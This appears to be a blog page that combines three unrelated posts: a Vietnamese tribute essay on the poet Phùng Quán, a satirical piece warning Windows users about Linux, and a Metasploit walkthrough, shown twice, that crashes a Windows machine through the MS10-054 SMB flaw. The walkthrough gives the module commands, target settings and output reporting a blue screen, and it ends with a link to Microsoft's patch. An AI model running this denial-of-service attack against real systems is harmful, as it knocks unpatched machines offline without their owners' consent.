PHÙNG QUÁN - NGƯỜI UỐNG RƯỢU CẤT TỪ LÁ KHỔ SÂM - Trần Ngọc Tuấn
Thi sĩ “lên rừng, hái lá khổ sâm, tự mình cất ly rượu sống”…sau bao năm sống bầm dập trong sự nghi ngờ là “lính quay giáo” (*) . Không thể là “lính quay giáo” được với một thi sĩ đã từng tuyên bố : “Như công nhân – Tôi muốn đúc thơ thành đạn – Bắn vào tim những kẻ làm càn – Những con người tiêu máu của dân – Như tiêu giấy bạc giả!”.
Không thể là “lính quay giáo” được với một thi sĩ có trái tim chân thành tuyệt đối : “Yêu ai cứ bảo là yêu – Ghét ai cứ bảo là ghét – Dù ai ngon ngọt nuông chiều – Cũng không nói yêu thành ghét – Dù ai cầm dao doạ giết – Cũng không nói ghét thành yêu” …
Thi sĩ “vừa ngâm ngợi câu thơ – vừa cạn chén rượu đời – cất bằng lá khổ sâm… Ôi rượu khổ sâm đắng lắm – đắng tận cùng nỗi đắng thế gian”…Câu thơ vọng từ “đêm Nghi Tàm đọc Đổ Phủ cho vợ nghe : Thơ ai như thơ ông – Lặng im mà gầm thét – Trang trang đều xé lòng – Câu câu đều tẩm huyết…Mỗi chữ đều như róc – Từ thịt xương cuộc đời – Từ bi thương phẫn uất…”. Câu thơ vọng từ đêm say cùng Lý Bạch : “Tăm tăm tình bạn – Chếnh choáng tình đời – Líu lưỡi tình người – Nôn nao thân phận! … Câu thơ bị biếm – Mềm môi ngâm tràn…Ta cười rượu xoàng – Uống hoài vẫn tỉnh”! Câu thơ vọng từ ngôi nhà có tiếng sóng của con sông Đuống : “Tôi tin núi tàn – Tôi tin sông lấp – Nhưng tôi không thể nào tin – Một nhà thơ như anh – Lại ngã lòng suy sụp”…
Giã từ rừng thiêng nước độc, thi sĩ về với sông Hương thơ mộng, đắm đuối với Trăng Hoàng Cung, “ngất ngưởng sống, ngất ngưởng thơ, ngất ngưởng say”…và “ngất ngưởng gặp Nàng”…Trong đêm hoàng cung, thi sĩ ngất ngưởng làm vua bên nàng là hoàng hậu …Nhưng “còn có nỗi thống khổ nào hơn” khi thi sĩ chợt hiểu “vào hoàng cung cũng là chuyện quá dễ dàng”…Thi sĩ “khóc niềm tin yêu nát tan – khóc ngai vàng mộng tưởng – khóc Trăng Hoàng Cung bị lấm bẩn, khóc không biết lấy gì để gột sạch Trăng” …
Thi sĩ hồn nhiên nghĩ rằng thơ có thể làm tiêu tan mọi gian trá, bất lương; lá khổ sâm có thể tẩy mọi chất độc trong cơ thể và Trăng Hoàng Cung không thể nào vấy bẩn … Vậy mà… Trong một ngày “tết không vào nhà tôi – tết đi qua trước ngõ” thi sĩ tự nhận: “bạc đầu vẫn trẻ con – dại khờ cho đến chết – giữa nghiệt ngã trần gian – trái tim thơ thấm mệt” …Thấm mệt nhưng không thể “chừng mực thơ… chừng mực yêu … chừng mực khổ đau … Giữa nghiệt ngã trần gian” thi sĩ thốt lên: “Thượng đế ơi ! Tôi đã làm gì ? Mà ly rượu đời Người ban cho tôi – Đắng thế”?
Đồng Nai, tháng 5 năm 2009
T.N.T (Đồng Nai)
Nguồn:
http://vannghesongcuulong.org.vn/modules.php?name=News&op=viewst&sid=5082
http://vi.wikipedia.org/wiki/Phùng_Quán
http://anhduong.net/nhanvat/Phungquan.htm
Xin cám ơn!
Tuesday, November 16, 2010
Saturday, November 6, 2010
BSoD With Vulnerability MS10_054
Hi everyone!
This is my guide. It is only demo!
Exploit with Metasploit
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
msf auxiliary(ms10_054_queryfs_pool_overflow) > info
Name: Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
Version: 9983
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Laurent Gaffie
jduck
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes The target port
SMBSHARE yes The name of a readable share on the server
Description:
This module exploits a denial of service flaw in the Microsoft
Windows SMB service on versions of Windows prior to the August 2010
Patch Tuesday. To trigger this bug, you must be able to access a
share with at least read privileges. That generally means you will
need authentication. However, if a system has a guest accessible
share, you can trigger it without any authentication.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2550
http://www.osvdb.org/66974
http://www.microsoft.com/technet/security/bulletin/MS10-054.mspx
http://seclists.org/fulldisclosure/2010/Aug/122
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
SMBSHARE yes The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > set rhost 192.168.10.28
msf auxiliary(ms10_054_queryfs_pool_overflow) > set smbshare Downloads
smbshare => Downloads
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.28 yes The target address
RPORT 445 yes The target port
SMBSHARE Downloads yes The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit
[*] Sending malformed trans2 request..
[*] The target should encounter a blue screen error now.
[*] Auxiliary module execution completed
msf auxiliary(ms10_054_queryfs_pool_overflow) > GAME OVER
Solution :
Microsoft has released a set of patches for Windows XP, Vista, 2008,
7, and 2008 R2 :
Update patch for your windows
http://www.microsoft.com/technet/security/bulletin/ms10-054.mspx
Some info:
http://www.exploit-db.com/exploits/14607/
http://www.nessus.org/plugins/index.php?view=single&id=48291
Thanks!!!
This is my guide. It is only demo!
Exploit with Metasploit
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
msf auxiliary(ms10_054_queryfs_pool_overflow) > info
Name: Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
Version: 9983
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Laurent Gaffie
jduck
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes The target port
SMBSHARE yes The name of a readable share on the server
Description:
This module exploits a denial of service flaw in the Microsoft
Windows SMB service on versions of Windows prior to the August 2010
Patch Tuesday. To trigger this bug, you must be able to access a
share with at least read privileges. That generally means you will
need authentication. However, if a system has a guest accessible
share, you can trigger it without any authentication.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2550
http://www.osvdb.org/66974
http://www.microsoft.com/technet/security/bulletin/MS10-054.mspx
http://seclists.org/fulldisclosure/2010/Aug/122
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
SMBSHARE yes The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > set rhost 192.168.10.28
msf auxiliary(ms10_054_queryfs_pool_overflow) > set smbshare Downloads
smbshare => Downloads
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.28 yes The target address
RPORT 445 yes The target port
SMBSHARE Downloads yes The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit
[*] Sending malformed trans2 request..
[*] The target should encounter a blue screen error now.
[*] Auxiliary module execution completed
msf auxiliary(ms10_054_queryfs_pool_overflow) > GAME OVER
Solution :
Microsoft has released a set of patches for Windows XP, Vista, 2008,
7, and 2008 R2 :
Update patch for your windows
http://www.microsoft.com/technet/security/bulletin/ms10-054.mspx
Some info:
http://www.exploit-db.com/exploits/14607/
http://www.nessus.org/plugins/index.php?view=single&id=48291
Thanks!!!
Monday, November 1, 2010
Planning to Migrate to Linux? BEWARE!!!
As more noise in favor of GNU/Linux is heard, some people might feel tempted to replace their solid, green-red-blue-and-yellow Windows system with an unknown, shady, black-and-white Linux penguin. Some of these users, thinking they are about to enter the Promised Land, fail to fully consider the disastrous consequences that abandoning the firm, old Windows tradition may cause.
In this light, I found appropriate to let these naive migrants know a number of issues to consider before they take the leap to their doom. These issues are based on empirical, but honest observation and may bring upon me the deepest animosity among GNU/Linux fans...even so, I'm determined to continue. The truth will be by my side.
Dear Windows user, before you migrate to Linux, make sure you understand some of the side-effects that may come after you take your experimental Linux pill:
1. Your computer may become dull or stop working:
Windows is a happy, efficient world where computers respond promptly and just work. They work and work even when you don't know. They work as zombies and botnets, sending spam mail (in the best of the cases) for some hacker out there who rightfully earned control over them. Just last year, there was an estimate of twelve million zombies. That is four times the whole population of a small country like mine. Imagine! A whole country made of zombies!!! That is a happy country! Windows is a happy world in which you (if you're a hacker) command and computers react. They react promptly to Trojans, worms and malware of all forms under the sun. If you install Linux and use it as your main OS, your computer may stop reacting to the Trojans, worms and malware that took cyber-criminals a lot of time and effort to design. Of course, if you engage into irresponsible security behavior, your PC may still be responsive to them, but not as it was with Windows. Are you sure you want a dull computer like that? Who wants a computer that fails to respond to malware by default? What? Your computer has never been part of a botnet, you say? Are you sure? Then, why is it that some users complain that their PCs still download updates regardless of their preferences? They are part of the biggest botnet in the world, that's why!
2. You will be totally unprotected:
Yes. It is not a mistake. Installing Linux will drag you away from computer protection. Windows users are protected by a very strong, fortified system of placebos: the solid support from Microsoft (that usually ignores or denies the problems, but after a considerable number of users complain, gives in and releases the patches), the A/V technologies (that are always playing catch-up with the malware), and Windows Security Essentials (that are pretty similar to A/Vs, but create a much better placebo effect because they come right from Microsoft). In contrast, once you install Linux, the only responsible for your protection will be yourself...and the penguin, that by the way, is armored to its teeth (yes! that bird has teeth and uses them to gnaw malware as fish!) Why would you want to take care of your own security as the Robin of a Bat-penguin if the placebo system will let you relax making you think that it is on charge (even if it isn't)?
3. Your world will go upside down:
Beware! Great danger here! After getting acquainted with Linux, you may discover some awful truths that will make your world shatter like broken Windows. For example, you may discover that you were paying for features Open Source gives you for free! Also, you may realize that some hardware manufacturers innocently make Linux installation and support harder...but who cares? That benefits indirectly our old friend! Your printer or scanner don't work? It is your fault for choosing to install an OS that is not proprietary and therefore has no proprietary drivers. You may then realize a horrible truth: companies don't care about customer satisfaction with their product...they just care about their policies. What's to them that you cannot use your hardware? You bought it already, silly person! You may also realize that all the hardware improvements your OS demanded from you were totally unnecessary. Linux could give life to that old computer you had sitting on a corner collecting dust. Imagine if all those old computers that people sent to the trashcan were still working perfectly...yes...much less pollution and a greener world. Forget the thought. All of us will die anyway, so let's keep littering and let our traditional OS tell us we need to replace our computers when we actually don't need to! That is part of life!
4. Your rights will be severed:
Linux is not just Ubuntu. This is a hard concept to grasp and it might blow your mind. Yes, Windows is Windows regardless if it is 3.11, 95, 98, 2000, ME (Wow! This is such a jewel!), XP, Vista (Another little gem!), or Vista/7. They all are Windows, full of the friendly features you cannot miss (BSODs, system crashes, freezes, etc.). What about Linux? Ubuntu? Naaah! Ubuntu is just ONE Linux flavor and all Linux flavors behave quite differently. With Windows, things are simple: if your Windows doesn't work, you have a dead computer. Simple and nice. With Linux, things are so complicated! If Ubuntu doesn't work, then there is Mandriva. If Mandriva doesn't work, then you could try Mint. No? What about Mepis? What did you say? All of them worked fine but but you don't like them? You can fully customize them as you want. No time for that? Then try Fedora, PCLinuxOS, Debian, OpenSuse, Sabayon, Pardus, Arch, Slackware, Red Hat, Puppy, Knoppix, Elive, Unity...and the list goes on! Why does Linux have to make things so complex? Who wants so many options plus the total freedom to choose? Doesn't that crazy penguin know that it is much better to tell users what they need or want and limit the choices to 5 options most (reducing them progressively, too)? That is the RIGHT way of doing things because your right is to be kept on a nice leash (as your computer, crippled by design, is)! Freedom is for free people and in this happy world being free means being sad...and alone. Therefore, Linux brings sadness! Get Linux, get ready for a very sad life!
I could continue mentioning the dangers of the learning process (remember: learning makes sick brains!) that embracing that obnoxious penguin may also bring about, but I'm done for now. I will just sit down and wait for GNU/Linux fans to start tearing me apart rabidly. Hopefully, dear Windows user, you will think twice before falling for Linux.
Source: http://linuxmigrante.blogspot.com/2010/10/planning-to-migrate-to-linux-beware.html
And here is translate by Le Trung Nghia
http://vnfoss.blogspot.com/2010/10/inh-chuyen-sang-linux-can-than-ay.html
thanks!!!
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